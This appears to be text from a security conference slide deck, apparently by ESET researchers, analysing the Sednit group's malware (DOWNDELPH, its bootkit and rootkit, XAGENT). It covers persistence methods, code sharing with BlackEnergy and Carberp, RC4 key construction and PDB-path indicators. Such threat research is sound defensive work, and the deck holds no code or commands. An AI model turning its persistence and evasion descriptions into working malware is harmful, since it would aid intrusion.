196. Who Are You Bootkit?
• Missing exported variable in DOWNDELPH
197. Who Are You Bootkit?
• Missing exported variable in DOWNDELPH
• Code sharing with BlackEnergy
– Relocations fixing
– DLL injection calling three exports (“Entry”,
“ep_data” and “Dummy”)
– …
198. But It’s Not The End of The Story
2014 DOWNDELPH Samples
Dropper
Helper
Kernel Mode
Rootkit
DOWNDELPH
206. Who Are You Rootkit?
• Never documented (to the best of our
knowledge)
• PDB paths:
d:!worketchiBinDebugwin7x86fsflt.pdb
d:!worketchideinstaller_kis2013BinDebugwin7x64fsflt.pdb
d:newhideinstallerBinDebugwxpx86fsflt.pdb
207. Who Are You Rootkit?
• Never documented (to the best of our
knowledge)
• PDB paths:
d:!worketchiBinDebugwin7x86fsflt.pdb
d:!worketchideinstaller_kis2013BinDebugwin7x64fsflt.pdb
d:newhideinstallerBinDebugwxpx86fsflt.pdb
208. Who Are You Rootkit?
• Never documented (to the best of our
knowledge)
• PDB paths:
d:!worketchiBinDebugwin7x86fsflt.pdb
d:!worketchideinstaller_kis2013BinDebugwin7x64fsflt.pdb
d:newhideinstallerBinDebugwxpx86fsflt.pdb
209. To Summarize
• Seven different samples (!) of DOWNDELPH over
the past three years
• One C&C server was up for two years
• Persistence methods:
– Bootkit able to infect from Windows XP to Windows 7
– Rootkit
• So, WHY such advanced persistence methods for
such a simple component?
• DOWNDELPH downloaded SEDRECO + XAGENT in
a few cases, so SEDNIT related for sure
211. Call For Speculation
• The diversity of Sednit software is impressive
(DOWNDELPH, bootkit, XAGENT, SEDKIT…)
• Diversity is good for their operations, as it
makes detection and tracking harder
• How did they created this software
ecosystem?
117
212. Sednit Development Process (1)
Developers Role
• Binaries are often compiled specifically for a
target, after it has been infected
118
XAGENT SMTP logins/passwords
213. Sednit Development Process (1)
Developers Role
• Binaries are often compiled specifically for a
target, after it has been infected
• Main software evolve regularly (XTUNNEL,
SEDUPLOADER, XAGENT…)
118
XAGENT SMTP logins/passwords
214. Sednit Development Process (1)
Developers Role
• Binaries are often compiled specifically for a
target, after it has been infected
• Main software evolve regularly (XTUNNEL,
SEDUPLOADER, XAGENT…)
118
Developers are part of the team,
not outsiders paid for a one-time job
XAGENT SMTP logins/passwords
215. Sednit Development Process (2)
Software Design
• Different Sednit software share some
techniques:
– RC4 keys built as concatenation of a hardcoded
value and a randomly generated value
(XAGENT, DOWNDELPH, SEDUPLOADER)
– Hardcoded “tokens” in network messages
(XAGENT, SEDUPLOADER, SEDRECO)
119
216. Sednit Development Process (2)
Software Design
• Different Sednit software share some
techniques:
– RC4 keys built as concatenation of a hardcoded
value and a randomly generated value
(XAGENT, DOWNDELPH, SEDUPLOADER)
– Hardcoded “tokens” in network messages
(XAGENT, SEDUPLOADER, SEDRECO)
119
The same developers may be
behind this variety of software
222. Sednit Development Process (3)
Programming Errors
121
XTUNNEL report message
Developers do not have a code
review process (“hackish” feeling)
223. Sednit Development Process (4)
Seeking Inspiration
• SEDUPLOADER employed novel persistence
methods also found in crimeware, and shares
code with Carberp
• DOWNDELPH bootkit code bears some
similarities with BlackEnergy code
122
224. Sednit Development Process (4)
Seeking Inspiration
• SEDUPLOADER employed novel persistence
methods also found in crimeware, and shares
code with Carberp
• DOWNDELPH bootkit code bears some
similarities with BlackEnergy code
122
Developers have ties with the
crimeware underground
227. Mumblings Summary
Sednit has some in-house skilled developers,
working with little supervision, and those guys
have ties with crimeware underground
124
228. Conclusion
• Sednit activity increased a lot during the last
two years (targeted attacks with a LOT of
targets)
– Heard about the DNC hack last week?
• Sednit toolkit in constant evolution, moar fun
to come!
125
229. That’s All Folks!
• Feel free to poke us:
{calvet,campos,dupuy} .at. esetlabs.com
• Whitepaper coming soon!...
(“dans deux mois”)
126